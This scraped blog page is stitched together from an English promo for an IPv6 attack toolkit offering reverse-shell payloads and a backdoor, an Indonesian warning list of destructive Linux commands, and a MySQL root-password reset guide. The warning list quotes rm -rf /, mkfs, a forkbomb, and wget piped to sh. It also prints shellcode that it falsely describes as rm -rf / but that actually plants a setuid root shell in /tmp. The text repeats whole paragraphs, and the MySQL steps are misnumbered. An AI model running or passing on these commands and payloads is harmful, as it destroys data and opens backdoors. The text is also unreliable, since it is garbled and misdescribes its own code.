IPv6 Hackit
IPv6 is future protocol internet with rich of security features but hackers always do research and try to exploit it. Van Hauser of The Hacker Choice (THC) releases his IPv6 attack toolkit to exploit IPv6 protocol weakness. His tools can be freely downloaded on THC website. HD Moore, author Metasploit project wrote paper about Exploiting Tomorrow’s Internet Today: Penetration testing with IPv6 which can be read onhttp://www.uninformed.org. His paper tells us about exploiting IPv6 applications by proxying/relaying via IPv4.
IPSECS, unofficially releases his IPv6 Hackit on sourceforge and papers which nearly complete explains IPv6 exploitation. IPSECS wrote IPv6-Hackit using Perl Scripting Language which means that the tools don’t need to be compiled. Somehow, this tool needs some perl module to be installed.
IPSECS, unofficially releases his IPv6 Hackit on sourceforge and papers which nearly complete explains IPv6 exploitation. IPSECS wrote IPv6-Hackit using Perl Scripting Language which means that the tools don’t need to be compiled. Somehow, this tool needs some perl module to be installed.
This tool supports to do:
Hosts Enumeration finding which host is up/down.
TCP Port scanning to find which port is open/close.
Googling via unix shell to find possible IPv6 domains.
Finding AAAA IPv6 host record from single or massive collected domains.
Getting shell from IPv6 binding shellcode/payload.
Getting shell from IPv6 reverse shellcode/payload.
Exploiting simple IPv6 application weakness (currently this module is still developed)
IPv6 Binding backdoor with authentication (currently this module is still developed)
You can easily download this IPv6 Hackit on ipv6hackit.sourceforge.net.
Perintah Mematikan di Linux
2. Pada console 1, matikan service MySQL Anda, dengan mengetik perintah :
Hosts Enumeration finding which host is up/down.
TCP Port scanning to find which port is open/close.
Googling via unix shell to find possible IPv6 domains.
Finding AAAA IPv6 host record from single or massive collected domains.
Getting shell from IPv6 binding shellcode/payload.
Getting shell from IPv6 reverse shellcode/payload.
Exploiting simple IPv6 application weakness (currently this module is still developed)
IPv6 Binding backdoor with authentication (currently this module is still developed)
You can easily download this IPv6 Hackit on ipv6hackit.sourceforge.net.
Linux terkenal karena aspek keamanan penggunaan. Virus yang berteman baik dengan Windows misalnya, harus mencari cara yang sangat rumit untuk bisa menembus Linux.
Meski demikian, dunia yang fana ini (hehehe…) merupakan tempat bagi beragam orang dengan berbagai sifat. Para penjahat dan psikopat bisa saja menyamar di berbagai forum dan mailing list, dan alih-alih memberikan solusi justru bisa membuat anda menderita. Adakalanya perintah-perintah berbahaya di Linux dijadikan sebagai lelucon untuk menggoda (meski berbagai distro memiliki etika dan guiding principle yang melarang lelucon berbahaya) meski ada juga yang memang berniat menjebak orang lain.
Berikut adalah 7 perintah berbahaya yang disarikan dari 7 Deadly Command :
Meski demikian, dunia yang fana ini (hehehe…) merupakan tempat bagi beragam orang dengan berbagai sifat. Para penjahat dan psikopat bisa saja menyamar di berbagai forum dan mailing list, dan alih-alih memberikan solusi justru bisa membuat anda menderita. Adakalanya perintah-perintah berbahaya di Linux dijadikan sebagai lelucon untuk menggoda (meski berbagai distro memiliki etika dan guiding principle yang melarang lelucon berbahaya) meski ada juga yang memang berniat menjebak orang lain.
Berikut adalah 7 perintah berbahaya yang disarikan dari 7 Deadly Command :
- Perintah rm -rf /
Perintah ini akan menghapus seluruh isi folder / (root folder atau root directory). Root folder memang dilindungi oleh hak akses user root, tapi akan sangat berbahaya jika perintah diatas dieksekusi saat kita berada dalam hak akses root. Itulah mengapa sangat dianjurkan untuk menggunakan hak akses user biasa untuk kegiatan sehari-hari.Perintah diatas juga tetap berbahaya jika dijalankan oleh user biasa yang dapat merusak isi folder miliknya sendiri - Perintah menggunakan bilangan hexa char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; Perintah diatas sama dengan perintah pada nomor 1 hanya saja ditulis dalam bilangan hexa. Jika dieksekusi, sama halnya menghapus seluruh isi folder (rm -rf /). Karena ditulis dalam bilangan hexa, perintah ini bisa juga menjebak user Linux yang berpengalaman
- Perintah mkfs.ext3 /dev/sda
Perintah ini sama halnya melakukan perintah format pada partisi yang ditunjuk. - Perintah forkbomb :(){:|:&};:
Perintah ini akan memerintahkan sistem untuk mengeksekusi berbagai proses sampai hang. Biasanya akan mengakibatkan hilangnya data karena komputer terpaksa harus dimatikan secara paksa. - Perintah apapun > /dev
Perintah ini akan menimpa sistem file device yang ditunjuk dan pada akhirnya bisa menyebabkan hilangnya data yang dimounting pada folder /dev (folder /dev biasa digunakan untuk menempatkan keterangan hardware dan harddisk) - Perintah untuk eksekusi file shell tertentu
Perintah wget http://alamat-url-yangtidak-jelas -O- | sh akan memerintahkan Linux untuk langsung menjalankan file sh yang ditunjuk. File sh adalah file eksekusi di Linux, sama halnya file .exe. Jangan sekali-kali melakukan perintah diatas untuk file sh yang tidak jelas sumber dan peruntukannya. - Perintah memindahkan home folder ke /dev/null
mv /home/home-directory/* /dev/null
Perintah ini akan memindahkan seluruh data di home folder ke file null (file yang sebenarnya tidak ada). File yang dipindahkan akan hilang selamanya tanpa ada backup…
Reset Password root Database MySQL di Linux
MySQL adalah Relational Database Management System (RDBMS) yang merupakan turunan salah satu konsep utama dalam database yaitu SQL (Structured Query Language). SQL sendiri adalah sebuah konsep pengoperasian database, terutama untuk pemilihan atau seleksi dan pemasukan data, yang memungkinkan pengoperasian data dikerjakan dengan mudah secara otomatis. Kelebihan dari suatu sistem database (DBMS) dapat diketahui dari cara kerja optimizer-nya dalam melakukan proses perintah-perintah SQL, yang dibuat oleh user maupun program-program aplikasinya. Sebagai database server, MySQL dapat dikatakan lebih unggul dibandingkan database server lainnya dalam query data. MySQL juga memiliki portabilitas yang tinggi sehingga dapat berjalan stabil pada berbagai sistem operasi seperti Windows, Linux, FreeBSD, Mac Os X Server, Solaris, dan masih banyak lagi.
Namun dibalik kehandalannya pernahkah Anda lupa dengan password root MySQL Anda?Jika Anda mengalami hal seperti ini, jangan panik dahulu. Apalagi sampai menginstal ulang MySQL Anda. Berikut cara mereset password root MySQL Anda, sistem yang digunakan yaitu Linux distro Ubuntu :
1. Buka 2 console atau terminal Anda, bisa dengan kombinasi Ctrl+Alt+F1( console 1), Ctrl+Alt+F2(console 2), dst.2. Pada console 1, matikan service MySQL Anda, dengan mengetik perintah :
3. Pada console 2 aktifkan kembali service MySQL dengan option -–skip-grant-tables, dengan mengetik perintah:$sudo /etc/init.d/mysql stop
4. Balik ke console 1, jalankan MySQL client dengan mengetik perintah:$sudo mysqld –skip-grant-tables
5. Pilih database mysql$mysql
6. Kemudian ubah password root dengan melakukan query sebagai berikut:mysql> use mysql;
7. Lakukan flush privileges:mysql> update user set Password=password(‘password_baruku’) where User= ‘root’;
8. Kembali ke console 1 matikan service MySQL dengan cara:mysql> flush privileges;
9. Jalankan kembali service MySQL pada console 1 dengan cara:$sudo killall mysqld
$/etc/init.d/mysql start